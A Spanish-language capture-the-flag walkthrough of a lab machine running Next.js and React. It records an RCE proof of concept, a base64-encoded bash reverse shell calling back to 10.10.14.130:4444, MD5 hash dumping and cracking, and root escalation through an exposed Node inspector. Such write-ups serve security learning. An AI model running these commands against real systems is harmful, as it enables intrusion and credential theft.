Enumeración
#

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 ce:fd:0d:82:c0:23:ed:6e:4b:ea:13:fa:4f:ea:ef:b7 (ECDSA)
|_  256 f8:44:c6:46:58:7a:39:21:ef:16:44:e9:58:c2:f3:62 (ED25519)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
|     x-nextjs-cache: HIT
|     x-nextjs-prerender: 1
|     x-nextjs-stale-time: 4294967294
|     X-Powered-By: Next.js
|     Cache-Control: s-maxage=31536000, 
|     ETag: "p02u6gnhufd8t"
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 17175
|     Date: Sun, 24 May 2026 01:38:26 GMT
|     Connection: close
|     <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="stylesheet" href="/_next/static/css/414e1be982bc8557.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-db0a529a99835594.js"/><script src="/_next/static/chunks/4bd1b696-80bcaf75e1b4285e.js" async=""></script><script src="/_next/static/chunks/517-d083b552e04dead1.js" async=""></script><script s
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch
|     Allow: GET
|     Allow: HEAD
|     Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
|     Date: Sun, 24 May 2026 01:38:27 GMT
|     Connection: close
|   Help, NCP: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close

Puerto 3000
#

![[Pasted image 20260523213729.png]]

Con Wappalizer podemos ver que esta usando Next.js 15.0.3 y Node pero no tenemos la version.

Node version
#

Para encontrar la version de node tuve que instalar la extension React Developer Tools recargamos la pagina y en las herramientas de desarrollador tenemos la version:

![[Pasted image 20260523213955.png]]

Es la 19.0.0 la cual es perfectamente vulnerable

Usuario
#

Para esto vamos a estar usando primero para obtener ejecución de comandos y posteriormente una shell una PoC

$ python3 main.py http://10.129.1.209:3000

500
0:{"a":"$@1","f":"","b":"L3bimJe_3LvBcFWAnK5L4"}
1:E{"digest":"uid=999(node) gid=988(node) groups=988(node)"}

$ python3 penelope.py

$ python3 main.py http://10.129.3.178:3000 "printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTMwLzQ0NDQgMD4mMSkgJg==|base64 -d|bash"

node@reactor:/opt/reactor-app$ sqlite3 reactor.db
sqlite> select * from users;

1|admin|a203b22191d744a4e70ada5c101b17b8|administrator|admin@reactor.htb
2|engineer|39d97110eafe2a9a68639812cd271e8e|operator|engineer@reactor.htb

Ahora podemos romper el hash de engineer con john en este caso se trata de un has tipo MD5:

$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5

reactor1         (?) # Password

$ ssh engineer@10.129.3.178

Root
#

engineer@reactor:~$ ps aux

root        1366  0.0  1.2 1067732 50196 ?       Ssl  14:38   0:01 /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js

Vemos que s esta ejecutando como root y que podemos ejecutar comandos según HackTricks

$ nc -lvnp 4444

engineer@reactor:~$ node inspect 127.0.0.1:9229

debug> repl
> process.mainModule.require('child_process').execSync('printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTMwLzQ0NDQgMD4mMSkgJg==|base64 -d|bash').toString()

$ whoami
root

Referencias
#

https://hacktricks.wiki/en/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.html

Enumeración#

Puerto 3000#

Node version#

Usuario#

Root#

Referencias#